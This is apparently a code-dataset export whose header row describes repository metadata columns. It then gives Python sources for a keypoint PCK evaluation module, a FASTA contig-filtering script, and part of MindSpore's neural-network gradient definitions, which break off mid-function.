hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f722ebb724af4503948aba102fe25a6ba9af7df5 | 11,171 | py | Python | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 52 | 2020-04-02T12:35:55.000Z | 2022-03-11T07:47:30.000Z | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 8 | 2020-06-04T07:34:34.000Z | 2021-09-18T21:17:26.000Z | acsm/benchmark/pck_eval.py | eldar/acsm | 04069e8bb4c12185473dc10c3355e5367fa98968 | [
"Apache-2.0"
] | 6 | 2020-07-12T02:12:18.000Z | 2021-03-06T05:03:33.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
'''
intervals : Define thresholds to evaluate pck score
kpnames : Keypoint names
bench_stats : stats
'''
def remove_nans(x):
return x[~np.isnan(x)]
def pck_at_intervals(intervals, error):
accuracy = []
for interval in intervals:
accuracy.append(float(np.round(np.mean(np.array(error) < interval), 3)))
return accuracy
def ck_at_interval(intervals, error):
cks = []
for interval in intervals:
cks.append(np.array(error) < interval)
return cks # len(intervals) x error.shape
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
pdb.set_trace()
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
return stats
def benchmark_all_instances_2(
intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
# valid_inds =
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
# pdb.set_trace()
if select_kp_ids is not None:
for group_name in select_kp_ids.keys():
kp_ids = select_kp_ids[group_name]
select_kp_error = mean_kp_error[:, kp_ids]
samples = remove_nans(select_kp_error.reshape(-1))
stats['eval_params'][
'{}_acc'.format(group_name)
] = pck_at_intervals(intervals, samples.tolist())
samples = remove_nans(mean_kp_error.reshape(-1))
stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
return stats
def benchmark_vis_instances(
intervals, dist_thresholds, kpnames, bench_stats, img_size
):
stats = {}
stats['data'] = {}
stats['eval_params'] = {}
stats['pck'] = {}
stats['interval'] = intervals
bench_stats_kps_error = 1 * bench_stats['kps_err']
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
ndata_points, nkps, _ = bench_stats['kps_err'].shape
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
for dx, dist_thresh in enumerate(dist_thresholds):
stats['eval_params'][dx] = {}
stats['eval_params'][dx]['correct'] = np.zeros(
(len(kpnames), len(intervals))
)
for kpx, kp_name in enumerate(kpnames):
valid_inds = np.where(
bench_stats_kps_error[:, kpx, 2] < dist_thresh
)[0].tolist()
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
valid_inds = set(valid_inds)
common_inds = set(common_inds)
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds & valid_inds))
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
ck[ex, :], axis=0
)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
bench_stats_kps_error[ex, kpx, 2] > dist_thresh
)
stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
stats['eval_params']['total'].reshape(-1, 1)
return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
bench_stats_kps_error = bench_stats['kps_err'] * 1
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
prediction_error = [] # N x 1
prediction_score = [] # N x 1
prediction_label = [] # N x len(intervals)
gt_label = []
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
for kpx, kp_name in enumerate(kp_names):
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds))
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 1)
gt_label.append(ck[ex, :] * 0 + 1)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 0)
gt_label.append(ck[ex, :] * 0)
prediction_error = np.concatenate(prediction_error, axis=0)
prediction_score = np.concatenate(prediction_score, axis=0)
prediction_label = np.concatenate(prediction_label, axis=0)
gt_label = np.concatenate(gt_label, axis=0)
stats = {}
stats['pred_label'] = prediction_label
stats['gt_label'] = gt_label
stats['score'] = prediction_score # lower the score better it is.
return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
# kp_eval_thresholds = [0.05, 1.0]
'''
select_kp_ids dict is a group of kp points
'''
def run_evaluation(
bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
select_kp_ids
):
json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
stats_m1 = benchmark_all_instances_2(
kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
)
stats = stats_m1
print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
pprint.pprint(
zip(
stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
stats['std_kp_err']
)
)
print('PCK Values')
pprint.pprint(stats['interval'])
pprint.pprint(stats['pck'])
mean_pck = {}
# pdb.set_trace()
for i, thresh in enumerate(stats['interval']):
mean_pck[thresh] = []
for kp_name in kp_names:
mean_pck[thresh].append(stats['pck'][kp_name][i])
mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
pprint.pprint('Mean PCK ')
pprint.pprint(mean_pck)
print('Instance Average **** ')
pprint.pprint(stats['eval_params']['acc'])
for group_name in select_kp_ids.keys():
print('Instance Average {} **** '.format(group_name))
pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
print('########################## ')
with open(json_file, 'w') as f:
json.dump(stats, f)
if dist_thresholds is not None:
stats_m1 = benchmark_vis_instances(
kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
)
stats = stats_m1
mean_pck = {}
# points_per_kp = {k: v for k, v in zip(kp_names, stats['eval_params'][0]['npoints'])}
# points_per_thresh = np.sum(np.array(points_per_kp.values()))
for dx, thresh in enumerate(dist_thresholds):
mean_pck[dx] = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[dx][thresh] = []
for kx, kp_name in enumerate(kp_names):
mean_pck[dx][thresh].append(
stats['eval_params'][dx]['acc'][kx, i]
)
mean_pck[dx] = {
k: np.round(np.mean(np.array(t)), 4)
for k, t in mean_pck[dx].items()
}
# pdb.set_trace()
print('***** Distance Thresholds ***** ')
pprint.pprint('Mean PCK Acc')
pprint.pprint(mean_pck)
# pprint.pprint(points_per_kp)
stats = collate_all_instances(
kp_eval_thresholds, kp_names, bench_stats, img_size
)
pr_stats = evaluate_pr.inst_bench_evaluate(
stats['pred_label'], stats['gt_label'], stats['score']
)
pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
sio.savemat(pr_mat_file, pr_stats)
return stats_m1
| 35.919614 | 94 | 0.598872 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path as osp
import numpy as np
import pprint
import pdb
from . import evaluate_pr
import scipy.io as sio
def remove_nans(x):
return x[~np.isnan(x)]
def pck_at_intervals(intervals, error):
accuracy = []
for interval in intervals:
accuracy.append(float(np.round(np.mean(np.array(error) < interval), 3)))
return accuracy
def ck_at_interval(intervals, error):
cks = []
for interval in intervals:
cks.append(np.array(error) < interval)
return cks
def benchmark_all_instances(intervals, kpnames, bench_stats, img_size):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
pdb.set_trace()
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
return stats
def benchmark_all_instances_2(
intervals, kpnames, bench_stats, img_size, select_kp_ids=None
):
stats = {}
plot_intervals = [0.025 * i for i in range(40)]
kp_error_nan_mask = bench_stats['kps_err'][:, :, 1] * 1
kp_error_nan_mask[kp_error_nan_mask < 0.5] = 'nan'
bench_stats_kps_err = bench_stats['kps_err'] / img_size
mean_kp_error = bench_stats_kps_err[:, :, 0] * kp_error_nan_mask
stats['mean_kp_err'] = [
float(t) for t in np.round(np.nanmean(mean_kp_error, 0), 4)
]
stats['median_kp_err'] = [
float(t) for t in np.round(np.nanmedian(mean_kp_error, 0), 4)
]
stats['std_kp_err'] = [
float(t) for t in np.round(np.nanstd(mean_kp_error, 0), 4)
]
stats['data'] = {}
stats['pck'] = {}
stats['interval'] = intervals
stats['kp_names'] = kpnames
stats['eval_params'] = {}
for kpx, kp_name in enumerate(kpnames):
stats['data'][kp_name] = remove_nans(mean_kp_error[:, kpx])
stats['data'][kp_name].sort()
stats['data'][kp_name] = [float(t) for t in stats['data'][kp_name]]
stats['pck'][kp_name] = pck_at_intervals(
intervals, stats['data'][kp_name]
)
stats['eval_params'][kp_name] = {}
stats['eval_params'][kp_name]['thresh'] = plot_intervals
stats['eval_params'][kp_name]['acc'] = pck_at_intervals(
plot_intervals, stats['data'][kp_name]
)
if select_kp_ids is not None:
for group_name in select_kp_ids.keys():
kp_ids = select_kp_ids[group_name]
select_kp_error = mean_kp_error[:, kp_ids]
samples = remove_nans(select_kp_error.reshape(-1))
stats['eval_params'][
'{}_acc'.format(group_name)
] = pck_at_intervals(intervals, samples.tolist())
samples = remove_nans(mean_kp_error.reshape(-1))
stats['eval_params']['acc'] = pck_at_intervals(intervals, samples.tolist())
return stats
def benchmark_vis_instances(
intervals, dist_thresholds, kpnames, bench_stats, img_size
):
stats = {}
stats['data'] = {}
stats['eval_params'] = {}
stats['pck'] = {}
stats['interval'] = intervals
bench_stats_kps_error = 1 * bench_stats['kps_err']
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
ndata_points, nkps, _ = bench_stats['kps_err'].shape
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
stats['eval_params']['total'] = np.sum(kps_vis1, axis=0) + 1E-10
for dx, dist_thresh in enumerate(dist_thresholds):
stats['eval_params'][dx] = {}
stats['eval_params'][dx]['correct'] = np.zeros(
(len(kpnames), len(intervals))
)
for kpx, kp_name in enumerate(kpnames):
valid_inds = np.where(
bench_stats_kps_error[:, kpx, 2] < dist_thresh
)[0].tolist()
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
valid_inds = set(valid_inds)
common_inds = set(common_inds)
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds & valid_inds))
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
ck[ex, :], axis=0
)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
stats['eval_params'][dx]['correct'][kpx] += np.sum(
bench_stats_kps_error[ex, kpx, 2] > dist_thresh
)
stats['eval_params'][dx]['acc'] = stats['eval_params'][dx]['correct'] / \
stats['eval_params']['total'].reshape(-1, 1)
return stats
def collate_all_instances(intervals, kp_names, bench_stats, img_size):
bench_stats_kps_error = bench_stats['kps_err'] * 1
bench_stats_kps_error[:, :, 0] = bench_stats_kps_error[:, :, 0] / img_size
prediction_error = []
prediction_score = []
prediction_label = []
gt_label = []
kps_vis1 = bench_stats['kps1'][:, :, 2] > 200
kps_vis2 = bench_stats['kps2'][:, :, 2] > 200
for kpx, kp_name in enumerate(kp_names):
common_inds = np.where(bench_stats_kps_error[:, kpx, 1] > 0.5
)[0].tolist()
ck = ck_at_interval(intervals, bench_stats_kps_error[:, kpx, 0])
ck = np.stack(ck, axis=1)
ex = np.array(list(common_inds))
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 1)
gt_label.append(ck[ex, :] * 0 + 1)
kps_vis1_ind = np.where(kps_vis1[:, kpx])[0]
kps_vis2_ind = np.where(kps_vis2[:, kpx])[0]
ex = np.array(list(set(kps_vis1_ind) - set(kps_vis2_ind))
).astype(np.int)
if len(ex) > 0:
prediction_error.append(bench_stats_kps_error[ex, kpx, 0])
prediction_score.append(bench_stats_kps_error[ex, kpx, 2])
prediction_label.append(ck[ex, :] * 0)
gt_label.append(ck[ex, :] * 0)
prediction_error = np.concatenate(prediction_error, axis=0)
prediction_score = np.concatenate(prediction_score, axis=0)
prediction_label = np.concatenate(prediction_label, axis=0)
gt_label = np.concatenate(gt_label, axis=0)
stats = {}
stats['pred_label'] = prediction_label
stats['gt_label'] = gt_label
stats['score'] = prediction_score
return stats
kp_eval_thresholds = [0.05, 0.1, 0.2]
def run_evaluation(
bench_stats, n_iter, results_dir, img_size, kp_names, dist_thresholds,
select_kp_ids
):
json_file = osp.join(results_dir, 'stats_m1_{}.json'.format(n_iter))
stats_m1 = benchmark_all_instances_2(
kp_eval_thresholds, kp_names, bench_stats, img_size, select_kp_ids
)
stats = stats_m1
print(' Method 1 | Keypoint | Median Err | Mean Err | STD Err')
pprint.pprint(
zip(
stats['kp_names'], stats['median_kp_err'], stats['mean_kp_err'],
stats['std_kp_err']
)
)
print('PCK Values')
pprint.pprint(stats['interval'])
pprint.pprint(stats['pck'])
mean_pck = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[thresh] = []
for kp_name in kp_names:
mean_pck[thresh].append(stats['pck'][kp_name][i])
mean_pck = {k: np.mean(np.array(t)) for k, t in mean_pck.items()}
pprint.pprint('Mean PCK ')
pprint.pprint(mean_pck)
print('Instance Average **** ')
pprint.pprint(stats['eval_params']['acc'])
for group_name in select_kp_ids.keys():
print('Instance Average {} **** '.format(group_name))
pprint.pprint(stats['eval_params']['{}_acc'.format(group_name)])
print('########################## ')
with open(json_file, 'w') as f:
json.dump(stats, f)
if dist_thresholds is not None:
stats_m1 = benchmark_vis_instances(
kp_eval_thresholds, dist_thresholds, kp_names, bench_stats, img_size
)
stats = stats_m1
mean_pck = {}
for dx, thresh in enumerate(dist_thresholds):
mean_pck[dx] = {}
for i, thresh in enumerate(stats['interval']):
mean_pck[dx][thresh] = []
for kx, kp_name in enumerate(kp_names):
mean_pck[dx][thresh].append(
stats['eval_params'][dx]['acc'][kx, i]
)
mean_pck[dx] = {
k: np.round(np.mean(np.array(t)), 4)
for k, t in mean_pck[dx].items()
}
print('***** Distance Thresholds ***** ')
pprint.pprint('Mean PCK Acc')
pprint.pprint(mean_pck)
stats = collate_all_instances(
kp_eval_thresholds, kp_names, bench_stats, img_size
)
pr_stats = evaluate_pr.inst_bench_evaluate(
stats['pred_label'], stats['gt_label'], stats['score']
)
pr_mat_file = osp.join(results_dir, 'pr_{}.mat'.format(n_iter))
sio.savemat(pr_mat_file, pr_stats)
return stats_m1
| true | true |
f722ec22feb4a0e855ee2c090316f8719c6ae702 | 713 | py | Python | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | src/fastx/target.py | sjin09/fastx | 2a4717eb64eff6655b716862b45b6b50f6bb0bc7 | [
"MIT"
] | null | null | null | import gzip
import natsort
from Bio import SeqIO
def get_target(infile: str, outfile) -> None:
contig_hsh = {}
SEX_CHROMOSOME = ("W", "X", "Y", "Z")
sequences = SeqIO.parse(infile, "fasta") if infile.endswith(".fasta") else SeqIO.parse(gzip.open(infile, "rt"), "fasta")
for i in sequences:
contig = i.id
contig_length = len(i.seq)
if (contig.startswith("Super") or contig.startswith("SUPER")) and not "unloc" in contig and not contig.endswith(SEX_CHROMOSOME) and contig_length > 1000000:
contig_hsh[contig] = contig_length
contig_lst = natsort.natsorted(list(contig_hsh.keys()))
for contig in contig_lst:
outfile.write("{}\n".format(contig))
| 37.526316 | 164 | 0.663394 | import gzip
import natsort
from Bio import SeqIO
def get_target(infile: str, outfile) -> None:
contig_hsh = {}
SEX_CHROMOSOME = ("W", "X", "Y", "Z")
sequences = SeqIO.parse(infile, "fasta") if infile.endswith(".fasta") else SeqIO.parse(gzip.open(infile, "rt"), "fasta")
for i in sequences:
contig = i.id
contig_length = len(i.seq)
if (contig.startswith("Super") or contig.startswith("SUPER")) and not "unloc" in contig and not contig.endswith(SEX_CHROMOSOME) and contig_length > 1000000:
contig_hsh[contig] = contig_length
contig_lst = natsort.natsorted(list(contig_hsh.keys()))
for contig in contig_lst:
outfile.write("{}\n".format(contig))
| true | true |
f722ec49b89c5a27a174dc656de3e484cbe78278 | 39,113 | py | Python | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | 4 | 2021-01-26T09:14:01.000Z | 2021-01-26T09:17:24.000Z | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/_grad/grad_nn_ops.py | GuoSuiming/mindspore | 48afc4cfa53d970c0b20eedfb46e039db2a133d5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define the grad rules of neural network related operations."""
import os
import numpy as np
from mindspore.ops import _selected_grad_ops as SG
from mindspore.ops.primitive import constexpr
from mindspore.common.tensor import Tensor
from mindspore.ops.operations import nn_ops as nps
from .grad_base import bprop_getters
from .. import functional as F
from .. import operations as P
from ...common import dtype as mstype
from ..composite.multitype_ops.zeros_like_impl import zeros_like
from ..operations import _grad_ops as G
from ..operations import _inner_ops as inner
from ... import context
env_force_bprop_seq = os.getenv("ENV_FORCE_BPROP_SEQ")
@bprop_getters.register(P.BiasAdd)
def get_bprop_bias_add(self):
"""Grad definition for `BiasAdd` operation."""
bias_grad = SG.BiasAddGrad(self.data_format)
def bprop(x, w, out, dout):
return dout, bias_grad(dout)
return bprop
@bprop_getters.register(P.Conv2D)
def get_bprop_conv2d(self):
"""Grad definition for `Conv2D` operation."""
input_grad = P.Conv2DBackpropInput(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
filter_grad = G.Conv2DBackpropFilter(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(dout, w, get_shape(x))
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(dout, x, get_shape(w))
return dx, dw
return bprop
@bprop_getters.register(nps.Conv3D)
def get_bprop_conv3d(self):
"""Grad definition for `Conv3D` operation."""
input_grad = nps.Conv3DBackpropInput(
self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
filter_grad = G.Conv3DBackpropFilter(
self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(w, dout, get_shape(x))
dw = filter_grad(x, dout, get_shape(w))
return dx, dw
return bprop
@bprop_getters.register(nps.Conv3DTranspose)
def get_bprop_conv3d_transpose(self):
"""Grad definition for `Conv3DTranspose` operation."""
input_grad = nps.Conv3D(
out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
filter_grad = G.Conv3DBackpropFilter(
out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
input_size = self.input_size
def bprop(x, w, out, dout):
dx = input_grad(dout, w)
dw = filter_grad(dout, x, F.shape(w))
return dx, dw, zeros_like(input_size)
return bprop
@bprop_getters.register(inner.ExtractImagePatches)
def get_bprop_extract_image_patches(self):
"""Grad definition for `ExtractImagePatches` operation."""
get_shape = P.Shape()
reshape = P.Reshape()
extract_image_patches = inner.ExtractImagePatches(ksizes=self.ksizes,
strides=self.strides,
rates=self.rates,
padding=self.padding)
concat = P.Concat(axis=-1)
expand_dims = P.ExpandDims()
scatter_nd = P.ScatterNd()
dtype = P.DType()
fill = P.Fill()
slice_op = P.Slice()
transpose = P.Transpose()
cast = P.Cast()
matmul = P.MatMul()
_, _, ksizes_row, ksizes_col = self.ksizes
def bprop(x, out, dout):
x_shape = get_shape(x)
x_batch, x_depth, x_row, x_col = x_shape
x_indices_num = x_row * x_col + 1
x_idx = cast(F.tuple_to_array(range(1, x_indices_num)), mstype.float32)
x_idx = reshape(x_idx, (1, 1, x_row, x_col))
x_idx_patch = cast(extract_image_patches(x_idx), mstype.int32)
x_idx_patch = transpose(x_idx_patch, (0, 2, 3, 1))
out_shape = get_shape(out)
_, _, out_row, out_col = out_shape
out_indices_num = out_row * out_col * ksizes_row * ksizes_col
out_idx = F.tuple_to_array(range(out_indices_num))
out_idx = reshape(out_idx, (1, out_row, out_col, ksizes_row * ksizes_col))
idx_tensor = concat((expand_dims(x_idx_patch, -1), expand_dims(out_idx, -1)))
idx_tensor = reshape(idx_tensor, (-1, 2))
sp_shape = (x_indices_num, out_indices_num)
sp_tensor = scatter_nd(idx_tensor, fill(dtype(dout), (out_indices_num,), 1), sp_shape)
sp_tensor = slice_op(sp_tensor, (1, 0), (x_indices_num - 1, out_indices_num))
grad = transpose(dout, (0, 2, 3, 1))
grad = reshape(grad, (x_batch, out_row, out_col, ksizes_row, ksizes_col, x_depth))
grad = transpose(grad, (1, 2, 3, 4, 0, 5))
grad = reshape(grad, (-1, x_batch * x_depth))
jac = matmul(sp_tensor, grad)
dx = reshape(jac, (x_row, x_col, x_batch, x_depth))
dx = transpose(dx, (2, 3, 0, 1))
return (dx,)
return bprop
@bprop_getters.register(P.DepthwiseConv2dNative)
def get_bprop_depthwise_conv2d_native(self):
"""Grad definition for `DepthwiseConv2dNative` operation."""
input_grad = G.DepthwiseConv2dNativeBackpropInput(
self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
self.dilation, self.group
)
filter_grad = G.DepthwiseConv2dNativeBackpropFilter(
self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
self.dilation, self.group
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(get_shape(x), w, dout)
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(x, get_shape(w), dout)
return dx, dw
return bprop
@bprop_getters.register(P.MaxPoolWithArgmax)
def get_bprop_max_pool_with_argmax(self):
"""Grad definition for `MaxPoolWithArgmax` operation."""
maxpool_grad = G.MaxPoolGradWithArgmax(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x, out, dout):
dx = maxpool_grad(x, dout[0], out[1])
return (dx,)
return bprop
@bprop_getters.register(G.MaxPoolGrad)
def get_bprop_max_pool_grad_grad(self):
"""Grad definition for `MaxPoolGrad` operation."""
maxpool_grad_grad = G.MaxPoolGradGrad(
kernel_size=self.kernel_size,
